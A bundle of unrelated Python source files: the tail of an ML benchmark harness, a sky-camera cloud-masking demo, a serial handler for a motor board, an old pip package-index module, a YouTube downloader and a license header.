return "Accuracy = {:.3f}, Threshold = {:.3f}. Accuracy test {:}.".format(accuracy, threshold, accuracy_result)
def handle_calibrate(benchmark_name, config):
logging.info("Generating calibration cache for Benchmark \"{:}\"".format(benchmark_name))
config = apply_overrides(config, common_args.CALIBRATION_ARGS)
config["dla_core"] = None
b = get_benchmark(benchmark_name, config)
b.calibrate()
def main():
# Turn off MPS in case it's turned on.
turn_off_mps()
main_args = common_args.parse_args(common_args.MAIN_ARGS)
benchmarks = ["mobilenet", "resnet", "ssd-small", "ssd-large", "gnmt"]
benchmarks_legacy_map = {
"ResNet50": "resnet",
"MobileNet": "mobilenet",
"SSDMobileNet": "ssd-small",
"SSDResNet34": "ssd-large",
"GNMT": "gnmt"
}
if main_args["benchmarks"] is not None:
benchmarks = main_args["benchmarks"].split(",")
for i, benchmark in enumerate(benchmarks):
if benchmark in benchmarks_legacy_map:
benchmarks[i] = benchmarks_legacy_map[benchmark]
scenarios = ["SingleStream", "MultiStream", "Offline", "Server"]
scenarios_legacy_map = {
"single_stream": "SingleStream",
"multi_stream": "MultiStream",
"offline": "Offline",
"server": "Server"
}
if main_args["scenarios"] is not None:
scenarios = main_args["scenarios"].split(",")
for i, scenario in enumerate(scenarios):
if scenario in scenarios_legacy_map:
scenarios[i] = scenarios_legacy_map[scenario]
# Automatically detect architecture and scenarios and load configs
config_files = main_args["configs"]
if config_files == "":
config_files = find_config_files(benchmarks, scenarios)
if config_files == "":
logging.warn("Cannot find any valid configs for the specified benchmarks scenarios.")
return
logging.info("Using config files: {:}".format(str(config_files)))
configs = load_configs(config_files)
for config in configs:
logging.info("Processing config \"{:}\"".format(config["config_name"]))
benchmark_name = config["benchmark"]
benchmark_conf = config[benchmark_name]
# Passthrough for top level values
benchmark_conf["system_id"] = config["system_id"]
benchmark_conf["scenario"] = config["scenario"]
benchmark_conf["benchmark"] = config["benchmark"]
benchmark_conf["config_name"] = config["config_name"]
need_gpu = not main_args["no_gpu"]
need_dla = not main_args["gpu_only"]
if main_args["action"] == "generate_engines":
# Turn on MPS if server scenario and if active_sms is specified.
benchmark_conf = apply_overrides(benchmark_conf, ["active_sms"])
active_sms = benchmark_conf.get("active_sms", None)
if config["scenario"] == "Server" and active_sms is not None and active_sms < 100:
with ScopedMPS(active_sms):
launch_handle_generate_engine(benchmark_name, benchmark_conf, need_gpu, need_dla)
else:
launch_handle_generate_engine(benchmark_name, benchmark_conf, need_gpu, need_dla)
elif main_args["action"] == "run_harness":
handle_run_harness(benchmark_name, benchmark_conf, need_gpu, need_dla)
elif main_args["action"] == "calibrate":
# To generate calibration cache, we only need to run each benchmark once. Use offline config.
if benchmark_conf["scenario"] == "Offline":
handle_calibrate(benchmark_name, benchmark_conf)
if __name__ == "__main__":
mp.set_start_method("spawn")
main()
|
cloud_mask_demo.py
|
import numpy as np
import os, glob
from matplotlib import pyplot as plt
import camera as cam
import time, sys
import stat_tools as st
from scipy.ndimage import morphology,filters, measurements ####more efficient than skimage
from scipy import signal
from skimage.morphology import remove_small_objects
# from skimage import measure
from collections import deque
import pickle,multiprocessing
import subprocess
# import cv2,of_dis
MAX_INTERVAL = 180 ####max allowed interval between two frames for cloud motion estimation
SAVE_FIG=False
cameraIDs=['HD5A', 'HD5B', 'HD4A','HD4B', 'HD3A', 'HD3B','HD2B', 'HD2C', 'HD1B', 'HD1C'];
ixy={'HD5A':[0,0],'HD5B':[1,0],'HD4A':[2,0],'HD4B':[3,0],'HD3A':[4,0],'HD3B':[0,2], \
'HD2B':[1,2],'HD2C':[2,2],'HD1B':[3,2],'HD1C':[4,2]}
# cameraIDs=['HD2C', 'HD2B', 'HD3B'];
# cameraIDs=['HD2B'];
if len(sys.argv)>=2:
days=[sys.argv[1]]
else:
days=['2018082312[0,2,4]','20180825161','20180829165','2018082112[0,1]','20180830181','20180824171','20180821132']
# days=['20180825161']; ####multilayer cloud
# days=['20180829165'] #####scattered cloud
# days=['20180821121'] #####thin, overcast cloud
# days=['20180821120'] #####overcast cloud
# days=['20180830181'] #####blue sky
# days=['20180824171'] ###gray sky
# days=['20180821132'] ##### partial cloud
days=['20180829162'];
# days=['20180825161','20180823124','20180829165','20180821132','20180830181','20180824171'];
days=['20181001141'] #####scattered cloud
days=['20180911151'] #####scattered cloud
inpath='~/data/images/'
outpath='~/ldata/results/cm/'
# tmpfs='/dev/shm/'
tmpfs='~/ldata/tmp/'
def visualize(camIDs, dates):
for day in dates:
flist = sorted(glob.glob(inpath+camIDs[0]+'/'+day[:8]+'/'+camIDs[0]+'_'+day+'*.jpg'))
if len(flist)<=1:
continue
for f in flist[1:]:
ymdhms=f[-18:-4]
print(ymdhms)
counter=0;
for counter in range(10):
try:
pkls=sorted(glob.glob(tmpfs+day[:8]+'/HD*_'+ymdhms+'.pkl'));
except:
time.sleep(5);
continue
if len(pkls)>=max(1,len(camIDs)-2):
break;
time.sleep(5);
fig,ax=plt.subplots(4,5,figsize=(12,10),sharex=True,sharey=True);
for pkl in pkls:
camID=pkl[-23:-19]
if camID not in camIDs:
continue;
ix, iy=ixy[camID]
ax[iy,ix].set_title(camID);
ax[iy,ix].set_xticks([]); ax[iy,ix].set_yticks([])
ax[iy+1,ix].set_xticks([]); ax[iy+1,ix].set_yticks([])
img=None
with open(pkl,'rb') as input:
img=pickle.load(input);
if img is None:
continue
ax[iy,ix].imshow(img.rgb);
ax[iy+1,ix].imshow(img.cm,vmax=2);
plt.tight_layout();
plt.show();
# fig.savefig(outpath+ymdhms); plt.close();
def motion(args):
camera,day=args
ymd=day[:8]
flist = sorted(glob.glob(inpath+camera.camID+'/'+ymd+'/'+camera.camID+'_'+day+'*jpg'))
if len(flist)<=0:
return None
q=deque();
for f in flist:
# print("Start preprocessing ", f[-23:])
img=cam.image(camera,f); ###img object contains four data fields: rgb, red, rbr, and cm
img.undistort(camera,rgb=True); ###undistortion
# print("Undistortion completed ", f[-23:])
if img.rgb is None:
continue
q.append(img)
if len(q)<=1:
continue
####len(q) is always 2 beyond this point
if (q[-1].time-q[-2].time).seconds>=MAX_INTERVAL:
q.popleft(); q.popleft();
continue;
r1=q[-2].rgb[...,0].astype(np.float32); r1[r1<=0]=np.nan
r2=q[-1].rgb[...,0].astype(np.float32); r2[r2<=0]=np.nan
err0 = r2-r1; err0-=np.nanmean(err0)
cam.cloud_mask(camera,q[-1],q[-2]); ###one-layer cloud masking
q[-1].dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.msk');
q.popleft();
if __name__ == "__main__":
cameras=[];
for camID in cameraIDs:
cameras += [cam.camera(camID,max_theta=70,nx=1000,ny=1000)]
p0=multiprocessing.Process(target=visualize, args=(cameraIDs, days,))
p0.start();
# p = multiprocessing.Pool(len(cameraIDs))
# for day in days:
# if not os.path.isdir(tmpfs+day[:8]):
# try:
# subprocess.call(['mkdir', tmpfs+day[:8]])
# except:
# print('Cannot create directory,',tmpfs+day[:8])
# continue
# args=[[camera,day] for camera in cameras]
#
# p.map(motion,args)
p0.join();
|
SerialHandler.py
|
"""Serial Handler for Interaction with NomadBLDC Board"""
# SerialHandler.py
#
# Created on: March 20, 2020
# Author: Quincy Jones
#
# Copyright (c) <2020> <Quincy Jones - quincy@implementedrobotics.com/>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys
import glob
import serial
import time
import random
import threading
from HDLCHandler import HDLCHandler
from LogPrint import LogPrint as logger
#Serial Handler Interface
class SerialHandler:
def __init__(self, port, baud, packet_cb=None):
self.port = port # Port
self.baud = baud # Baud Rate
self.connected = False # Connected Flag
self.uart = serial.Serial(port, baudrate=baud, timeout=1) # Serial Port
self.hdlc = HDLCHandler(packet_cb) # HDLC Framing handler
self.close_event = threading.Event()
self.start_read_task() # Threaded Read Task
def close(self):
# Close Port
self.close_event.set()
self.uart.close()
def send_packet(self, packet):
hdlc_frame = self.hdlc.frame_packet(packet)
self.uart.write(hdlc_frame)
def start_read_task(self):
def recv_packet():
while(not self.close_event.is_set()):
if (self.uart.inWaiting() > 0): # Got Serial Data
byte = self.uart.read(1)
self.hdlc.process_byte(byte) # Send to HDLC to process packet
logger.print_info("Serial Receive Thread Terminated")
t = threading.Thread(target=recv_packet)
t.daemon = True
t.start()
@staticmethod
def get_available_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'): # WINDOWS
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'): #LINUX
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'): #MAC
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
|
index.py
|
"""Routines related to PyPI, indexes"""
import sys
import os
import re
import gzip
import mimetypes
try:
import threading
except ImportError:
import dummy_threading as threading
import posixpath
import pkg_resources
import random
import socket
import string
import zlib
from pip.log import logger
from pip.util import Inf
from pip.util import normalize_name, splitext
from pip.exceptions import DistributionNotFound, BestVersionAlreadyInstalled
from pip.backwardcompat import (WindowsError, BytesIO,
Queue, httplib, urlparse,
URLError, HTTPError, u,
product, url2pathname)
from pip.backwardcompat import Empty as QueueEmpty
from pip.download import urlopen, path_to_url2, url_to_path, geturl, Urllib2HeadRequest
__all__ = ['PackageFinder']
DEFAULT_MIRROR_URL = "last.pypi.python.org"
class PackageFinder(object):
"""This finds packages.
This is meant to match easy_install's technique for looking for
packages, by reading pages and looking for appropriate links
"""
def __init__(self, find_links, index_urls,
use_mirrors=False, mirrors=None, main_mirror_url=None):
self.find_links = find_links
self.index_urls = index_urls
self.dependency_links = []
self.cache = PageCache()
# These are boring links that have already been logged somehow:
self.logged_links = set()
if use_mirrors:
self.mirror_urls = self._get_mirror_urls(mirrors, main_mirror_url)
logger.info('Using PyPI mirrors: %s' % ', '.join(self.mirror_urls))
else:
self.mirror_urls = []
def add_dependency_links(self, links):
## FIXME: this shouldn't be global list this, it should only
## apply to requirements of the package that specifies the
## dependency_links value
## FIXME: also, we should track comes_from (i.e., use Link)
self.dependency_links.extend(links)
@staticmethod
def _sort_locations(locations):
"""
Sort locations into "files" (archives) and "urls", and return
a pair of lists (files,urls)
"""
files = []
urls = []
# puts the url for the given file path into the appropriate
# list
def sort_path(path):
url = path_to_url2(path)
if mimetypes.guess_type(url, strict=False)[0] == 'text/html':
urls.append(url)
else:
files.append(url)
for url in locations:
if url.startswith('file:'):
path = url_to_path(url)
if os.path.isdir(path):
path = os.path.realpath(path)
for item in os.listdir(path):
sort_path(os.path.join(path, item))
elif os.path.isfile(path):
sort_path(path)
else:
urls.append(url)
return files, urls
def make_pypi_url(self, url, url_name):
loc = posixpath.join(url, url_name)
# For maximum compatibility with easy_install, ensure the path
# ends in a trailing slash. Although this isn't in the spec
# (and PyPI can handle it without the slash) some other index
# implementations might break if they relied on easy_install's behavior.
if not loc.endswith('/'):
loc = loc + '/'
return loc
def find_requirement(self, req, upgrade):
url_name = req.url_name
# Only check main index if index URL is given:
main_index_url = None
if self.index_urls:
# Check that we have the url_name correctly spelled:
main_index_url = Link(self.make_pypi_url(self.index_urls[0], url_name))
# This will also cache the page, so it's okay that we get it again later:
page = self._get_page(main_index_url, req)
if page is None:
url_name = self._find_url_name(Link(self.index_urls[0]), url_name, req) or req.url_name
# Combine index URLs with mirror URLs here to allow
# adding more index URLs from requirements files
all_index_urls = self.index_urls + self.mirror_urls
if url_name is not None:
locations = [
self.make_pypi_url(url, url_name)
for url in all_index_urls] + self.find_links
else:
locations = list(self.find_links)
locations.extend(self.dependency_links)
for version in req.absolute_versions:
if url_name is not None and main_index_url is not None:
locations = [
posixpath.join(main_index_url.url, version, '/')] + locations
file_locations, url_locations = self._sort_locations(locations)
locations = [Link(url) for url in url_locations]
logger.debug('URLs to search for versions for %s:' % req)
for location in locations:
logger.debug('* %s' % location)
found_versions = []
found_versions.extend(
self._package_versions(
[Link(url, '-f') for url in self.find_links], req.name.lower()))
page_versions = []
for page in self._get_pages(locations, req):
logger.debug('Analyzing links from page %s' % page.url)
logger.indent += 2
try:
page_versions.extend(self._package_versions(page.links, req.name.lower()))
finally:
logger.indent -= 2
dependency_versions = list(self._package_versions(
[Link(url) for url in self.dependency_links], req.name.lower()))
if dependency_versions:
logger.info('dependency_links found: %s' % ', '.join([link.url for parsed, link, version in dependency_versions]))
file_versions = list(self._package_versions(
[Link(url) for url in file_locations], req.name.lower()))
if not found_versions and not page_versions and not dependency_versions and not file_versions:
logger.fatal('Could not find any downloads that satisfy the requirement %s' % req)
raise DistributionNotFound('No distributions at all found for %s' % req)
if req.satisfied_by is not None:
found_versions.append((req.satisfied_by.parsed_version, Inf, req.satisfied_by.version))
if file_versions:
file_versions.sort(reverse=True)
logger.info('Local files found: %s' % ', '.join([url_to_path(link.url) for parsed, link, version in file_versions]))
found_versions = file_versions + found_versions
all_versions = found_versions + page_versions + dependency_versions
applicable_versions = []
for (parsed_version, link, version) in all_versions:
if version not in req.req:
logger.info("Ignoring link %s, version %s doesn't match %s"
% (link, version, ','.join([''.join(s) for s in req.req.specs])))
continue
applicable_versions.append((link, version))
applicable_versions = sorted(applicable_versions, key=lambda v: pkg_resources.parse_version(v[1]), reverse=True)
existing_applicable = bool([link for link, version in applicable_versions if link is Inf])
if not upgrade and existing_applicable:
if applicable_versions[0][1] is Inf:
logger.info('Existing installed version (%s) is most up-to-date and satisfies requirement'
% req.satisfied_by.version)
raise BestVersionAlreadyInstalled
else:
logger.info('Existing installed version (%s) satisfies requirement (most up-to-date version is %s)'
% (req.satisfied_by.version, applicable_versions[0][1]))
return None
if not applicable_versions:
logger.fatal('Could not find a version that satisfies the requirement %s (from versions: %s)'
% (req, ', '.join([version for parsed_version, link, version in found_versions])))
raise DistributionNotFound('No distributions matching the version for %s' % req)
if applicable_versions[0][0] is Inf:
# We have an existing version, and its the best version
logger.info('Installed version (%s) is most up-to-date (past versions: %s)'
% (req.satisfied_by.version, ', '.join([version for link, version in applicable_versions[1:]]) or 'none'))
raise BestVersionAlreadyInstalled
if len(applicable_versions) > 1:
logger.info('Using version %s (newest of versions: %s)' %
(applicable_versions[0][1], ', '.join([version for link, version in applicable_versions])))
return applicable_versions[0][0]
def _find_url_name(self, index_url, url_name, req):
"""Finds the true URL name of a package, when the given name isn't quite correct.
This is usually used to implement case-insensitivity."""
if not index_url.url.endswith('/'):
# Vaguely part of the PyPI API... weird but true.
## FIXME: bad to modify this?
index_url.url += '/'
page = self._get_page(index_url, req)
if page is None:
logger.fatal('Cannot fetch index base URL %s' % index_url)
return
norm_name = normalize_name(req.url_name)
for link in page.links:
base = posixpath.basename(link.path.rstrip('/'))
if norm_name == normalize_name(base):
logger.notify('Real name of requirement %s is %s' % (url_name, base))
return base
return None
def _get_pages(self, locations, req):
"""Yields (page, page_url) from the given locations, skipping
locations that have errors, and adding download/homepage links"""
pending_queue = Queue()
for location in locations:
pending_queue.put(location)
done = []
seen = set()
threads = []
for i in range(min(10, len(locations))):
t = threading.Thread(target=self._get_queued_page, args=(req, pending_queue, done, seen))
t.setDaemon(True)
threads.append(t)
t.start()
for t in threads:
t.join()
return done
_log_lock = threading.Lock()
def _get_queued_page(self, req, pending_queue, done, seen):
while 1:
try:
location = pending_queue.get(False)
except QueueEmpty:
return
if location in seen:
continue
seen.add(location)
page = self._get_page(location, req)
if page is None:
continue
done.append(page)
for link in page.rel_links():
pending_queue.put(link)
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.-]+)', re.I)
_py_version_re = re.compile(r'-py([123]\.?[0-9]?)$')
def _sort_links(self, links):
"Returns elements of links in order, non-egg links first, egg links second, while eliminating duplicates"
eggs, no_eggs = [], []
seen = set()
for link in links:
if link not in seen:
seen.add(link)
if link.egg_fragment:
eggs.append(link)
else:
no_eggs.append(link)
return no_eggs + eggs
def _package_versions(self, links, search_name):
for link in self._sort_links(links):
for v in self._link_package_versions(link, search_name):
yield v
def _link_package_versions(self, link, search_name):
"""
Return an iterable of triples (pkg_resources_version_key,
link, python_version) that can be extracted from the given
link.
Meant to be overridden by subclasses, not called by clients.
"""
if link.egg_fragment:
egg_info = link.egg_fragment
else:
egg_info, ext = link.splitext()
if not ext:
if link not in self.logged_links:
logger.debug('Skipping link %s; not a file' % link)
self.logged_links.add(link)
return []
if egg_info.endswith('.tar'):
# Special double-extension case:
egg_info = egg_info[:-4]
ext = '.tar' + ext
if ext not in ('.tar.gz', '.tar.bz2', '.tar', '.tgz', '.zip'):
if link not in self.logged_links:
logger.debug('Skipping link %s; unknown archive format: %s' % (link, ext))
self.logged_links.add(link)
return []
if "macosx10" in link.path and ext == '.zip':
if link not in self.logged_links:
logger.debug('Skipping link %s; macosx10 one' % (link))
self.logged_links.add(link)
return []
version = self._egg_info_matches(egg_info, search_name, link)
if version is None:
logger.debug('Skipping link %s; wrong project name (not %s)' % (link, search_name))
return []
match = self._py_version_re.search(version)
if match:
version = version[:match.start()]
py_version = match.group(1)
if py_version != sys.version[:3]:
logger.debug('Skipping %s because Python version is incorrect' % link)
return []
logger.debug('Found link %s, version: %s' % (link, version))
return [(pkg_resources.parse_version(version),
link,
version)]
def _egg_info_matches(self, egg_info, search_name, link):
match = self._egg_info_re.search(egg_info)
if not match:
logger.debug('Could not parse version from link: %s' % link)
return None
name = match.group(0).lower()
# To match the "safe" name that pkg_resources creates:
name = name.replace('_', '-')
# project name and version must be separated by a dash
look_for = search_name.lower() + "-"
if name.startswith(look_for):
return match.group(0)[len(look_for):]
else:
return None
def _get_page(self, link, req):
return HTMLPage.get_page(link, req, cache=self.cache)
def _get_mirror_urls(self, mirrors=None, main_mirror_url=None):
"""Retrieves a list of URLs from the main mirror DNS entry
unless a list of mirror URLs are passed.
"""
if not mirrors:
mirrors = get_mirrors(main_mirror_url)
# Should this be made "less random"? E.g. netselect like?
random.shuffle(mirrors)
mirror_urls = set()
for mirror_url in mirrors:
# Make sure we have a valid URL
if not ("http://" or "https://" or "file://") in mirror_url:
mirror_url = "http://%s" % mirror_url
if not mirror_url.endswith("/simple"):
mirror_url = "%s/simple/" % mirror_url
mirror_urls.add(mirror_url)
return list(mirror_urls)
class PageCache(object):
"""Cache of HTML pages"""
failure_limit = 3
def __init__(self):
self._failures = {}
self._pages = {}
self._archives = {}
def too_many_failures(self, url):
return self._failures.get(url, 0) >= self.failure_limit
def get_page(self, url):
return self._pages.get(url)
def is_archive(self, url):
return self._archives.get(url, False)
def set_is_archive(self, url, value=True):
self._archives[url] = value
def add_page_failure(self, url, level):
self._failures[url] = self._failures.get(url, 0)+level
def add_page(self, urls, page):
for url in urls:
self._pages[url] = page
class HTMLPage(object):
"""Represents one page, along with its URL"""
## FIXME: these regexes are horrible hacks:
_homepage_re = re.compile(r'<th>\s*home\s*page', re.I)
_download_re = re.compile(r'<th>\s*download\s+url', re.I)
## These aren't so aweful:
_rel_re = re.compile("""<[^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*>""", re.I)
_href_re = re.compile('href=(?:"([^"]*)"|\'([^\']*)\'|([^>\\s\\n]*))', re.I|re.S)
_base_re = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I)
def __init__(self, content, url, headers=None):
self.content = content
self.url = url
self.headers = headers
def __str__(self):
return self.url
@classmethod
def get_page(cls, link, req, cache=None, skip_archives=True):
url = link.url
url = url.split('#', 1)[0]
if cache.too_many_failures(url):
return None
# Check for VCS schemes that do not support lookup as web pages.
from pip.vcs import VcsSupport
for scheme in VcsSupport.schemes:
if url.lower().startswith(scheme) and url[len(scheme)] in '+:':
logger.debug('Cannot look at %(scheme)s URL %(link)s' % locals())
return None
if cache is not None:
inst = cache.get_page(url)
if inst is not None:
return inst
try:
if skip_archives:
if cache is not None:
if cache.is_archive(url):
return None
filename = link.filename
for bad_ext in ['.tar', '.tar.gz', '.tar.bz2', '.tgz', '.zip']:
if filename.endswith(bad_ext):
content_type = cls._get_content_type(url)
if content_type.lower().startswith('text/html'):
break
else:
logger.debug('Skipping page %s because of Content-Type: %s' % (link, content_type))
if cache is not None:
cache.set_is_archive(url)
return None
logger.debug('Getting page %s' % url)
# Tack index.html onto file:// URLs that point to directories
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
# add trailing slash if not present so urljoin doesn't trim final segment
if not url.endswith('/'):
url += '/'
url = urlparse.urljoin(url, 'index.html')
logger.debug(' file: URL is directory, getting %s' % url)
resp = urlopen(url)
real_url = geturl(resp)
headers = resp.info()
contents = resp.read()
encoding = headers.get('Content-Encoding', None)
#XXX need to handle exceptions and add testing for this
if encoding is not None:
if encoding == 'gzip':
contents = gzip.GzipFile(fileobj=BytesIO(contents)).read()
if encoding == 'deflate':
contents = zlib.decompress(contents)
inst = cls(u(contents), real_url, headers)
except (HTTPError, URLError, socket.timeout, socket.error, OSError, WindowsError):
e = sys.exc_info()[1]
desc = str(e)
if isinstance(e, socket.timeout):
log_meth = logger.info
level =1
desc = 'timed out'
elif isinstance(e, URLError):
log_meth = logger.info
if hasattr(e, 'reason') and isinstance(e.reason, socket.timeout):
desc = 'timed out'
level = 1
else:
level = 2
elif isinstance(e, HTTPError) and e.code == 404:
## FIXME: notify?
log_meth = logger.info
level = 2
else:
log_meth = logger.info
level = 1
log_meth('Could not fetch URL %s: %s' % (link, desc))
log_meth('Will skip URL %s when looking for download links for %s' % (link.url, req))
if cache is not None:
cache.add_page_failure(url, level)
return None
if cache is not None:
cache.add_page([url, real_url], inst)
return inst
@staticmethod
def _get_content_type(url):
"""Get the Content-Type of the given url, using a HEAD request"""
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if not scheme in ('http', 'https', 'ftp', 'ftps'):
## FIXME: some warning or something?
## assertion error?
return ''
req = Urllib2HeadRequest(url, headers={'Host': netloc})
resp = urlopen(req)
try:
if hasattr(resp, 'code') and resp.code != 200 and scheme not in ('ftp', 'ftps'):
## FIXME: doesn't handle redirects
return ''
return resp.info().get('content-type', '')
finally:
resp.close()
@property
def base_url(self):
if not hasattr(self, "_base_url"):
match = self._base_re.search(self.content)
if match:
self._base_url = match.group(1)
else:
self._base_url = self.url
return self._base_url
@property
def links(self):
"""Yields all links in the page"""
for match in self._href_re.finditer(self.content):
url = match.group(1) or match.group(2) or match.group(3)
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
def rel_links(self):
for url in self.explicit_rel_links():
yield url
for url in self.scraped_rel_links():
yield url
def explicit_rel_links(self, rels=('homepage', 'download')):
"""Yields all links with the given relations"""
for match in self._rel_re.finditer(self.content):
found_rels = match.group(1).lower().split()
for rel in rels:
if rel in found_rels:
break
else:
continue
match = self._href_re.search(match.group(0))
if not match:
continue
url = match.group(1) or match.group(2) or match.group(3)
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
def scraped_rel_links(self):
for regex in (self._homepage_re, self._download_re):
match = regex.search(self.content)
if not match:
continue
href_match = self._href_re.search(self.content, pos=match.end())
if not href_match:
continue
url = href_match.group(1) or href_match.group(2) or href_match.group(3)
if not url:
continue
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
def clean_link(self, url):
"""Makes sure a link is fully encoded. That is, if a ' ' shows up in
the link, it will be rewritten to %20 (while not over-quoting
% or other characters)."""
return self._clean_re.sub(
lambda match: '%%%2x' % ord(match.group(0)), url)
class Link(object):
def __init__(self, url, comes_from=None):
self.url = url
self.comes_from = comes_from
def __str__(self):
if self.comes_from:
return '%s (from %s)' % (self.url, self.comes_from)
else:
return self.url
def __repr__(self):
return '<Link %s>' % self
def __eq__(self, other):
return self.url == other.url
def __hash__(self):
return hash(self.url)
@property
def filename(self):
_, netloc, path, _, _ = urlparse.urlsplit(self.url)
name = posixpath.basename(path.rstrip('/')) or netloc
assert name, ('URL %r produced no filename' % self.url)
return name
@property
def scheme(self):
return urlparse.urlsplit(self.url)[0]
@property
def path(self):
return urlparse.urlsplit(self.url)[2]
def splitext(self):
return splitext(posixpath.basename(self.path.rstrip('/')))
@property
def url_without_fragment(self):
scheme, netloc, path, query, fragment = urlparse.urlsplit(self.url)
return urlparse.urlunsplit((scheme, netloc, path, query, None))
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
@property
def egg_fragment(self):
match = self._egg_fragment_re.search(self.url)
if not match:
return None
return match.group(1)
_md5_re = re.compile(r'md5=([a-f0-9]+)')
@property
def md5_hash(self):
match = self._md5_re.search(self.url)
if match:
return match.group(1)
return None
@property
def show_url(self):
return posixpath.basename(self.url.split('#', 1)[0].split('?', 1)[0])
def get_requirement_from_url(url):
"""Get a requirement from the URL, if possible. This looks for #egg
in the URL"""
link = Link(url)
egg_info = link.egg_fragment
if not egg_info:
egg_info = splitext(link.filename)[0]
return package_to_requirement(egg_info)
def package_to_requirement(package_name):
"""Translate a name like Foo-1.2 to Foo==1.3"""
match = re.search(r'^(.*?)-(dev|\d.*)', package_name)
if match:
name = match.group(1)
version = match.group(2)
else:
name = package_name
version = ''
if version:
return '%s==%s' % (name, version)
else:
return name
def get_mirrors(hostname=None):
"""Return the list of mirrors from the last record found on the DNS
entry::
>>> from pip.index import get_mirrors
>>> get_mirrors()
['a.pypi.python.org', 'b.pypi.python.org', 'c.pypi.python.org',
'd.pypi.python.org']
Originally written for the distutils2 project by Alexis Metaireau.
"""
if hostname is None:
hostname = DEFAULT_MIRROR_URL
# return the last mirror registered on PyPI.
try:
hostname = socket.gethostbyname_ex(hostname)[0]
except socket.gaierror:
return []
end_letter = hostname.split(".", 1)
# determine the list from the last one.
return ["%s.%s" % (s, end_letter[1]) for s in string_range(end_letter[0])]
def string_range(last):
"""Compute the range of string between "a" and last.
This works for simple "a to z" lists, but also for "a to zz" lists.
"""
for k in range(len(last)):
for x in product(string.ascii_lowercase, repeat=k+1):
result = ''.join(x)
yield result
if result == last:
return
|
YoutubeDownloader.py
|
from PyQt5.QtCore import *
from pytube import YouTube
from threading import Thread
import Core.OSHandler as OSHandler
import Core.FFmpegHandler as FFmpegHandler
class YoutubeDownloader(QObject):
class DownloadHandler(QObject):
progressSignal = pyqtSignal([int, int])
completeSignal = pyqtSignal()
def getProgressSignal(self):
super(QObject, self).__init__()
return self.progressSignal
def progress(self, stream, chunk, bytes_remaining):
if stream == self.audioStream:
self.downloadedAudio = self.audioStream.filesize - bytes_remaining
elif stream == self.videoStream:
self.downloadedVideo = self.videoStream.filesize - bytes_remaining
downloaded = self.downloadedAudio + self.downloadedVideo
self.progressSignal.emit(downloaded, self.filesize)
def merge(self):
self.videoDownload.join()
self.audioDownload.join()
# merge via ffmpeg
FFmpegHandler.videoAudioMerge(str(QFileInfo('tmp/video.mp4').absoluteFilePath()),
str(QFileInfo('tmp/audio.mp4').absoluteFilePath()),
str(QFileInfo(self.filename).absoluteFilePath()))
print('done')
# delete tmp files
OSHandler.rmdir('tmp')
self.completeSignal.emit()
def __init__(self, filename, video):
print('downloading {} ...'.format(filename))
self.filename = filename
self.video = video
self.video.register_on_progress_callback(self.progress)
self.audioStream = self.video.streams.get_audio_only()
self.videoStream = self.video.streams.filter(adaptive=True, file_extension="mp4").order_by('resolution').desc().first()
self.filesize = self.videoStream.filesize + self.audioStream.filesize
self.downloadedAudio = 0
self.downloadedVideo = 0
self.videoDownload = Thread(target=self.videoStream.download, args=('tmp', 'video'))
self.videoDownload.start()
self.audioDownload = Thread(target=self.audioStream.download, args=('tmp', 'audio'))
self.audioDownload.start()
self.mergeThread = Thread(target=self.merge)
self.mergeThread.start()
def __init__(self, parent=None):
super(QObject, self).__init__(parent)
def download(self, url, filename):
fileInfo = QFileInfo(filename)
dirPath = fileInfo.absolutePath()
fileBaseName = fileInfo.baseName()
video = YouTube(url)
dh = self.DownloadHandler(filename, video)
return dh.getProgressSignal()
if __name__ == '__main__':
url = 'https://www.youtube.com/watch?v=d3D7Y_ycSms'
yd = YoutubeDownloader()
yd.download(url, '')
|
OpTestInstallUtil.py
|
#!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2018
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
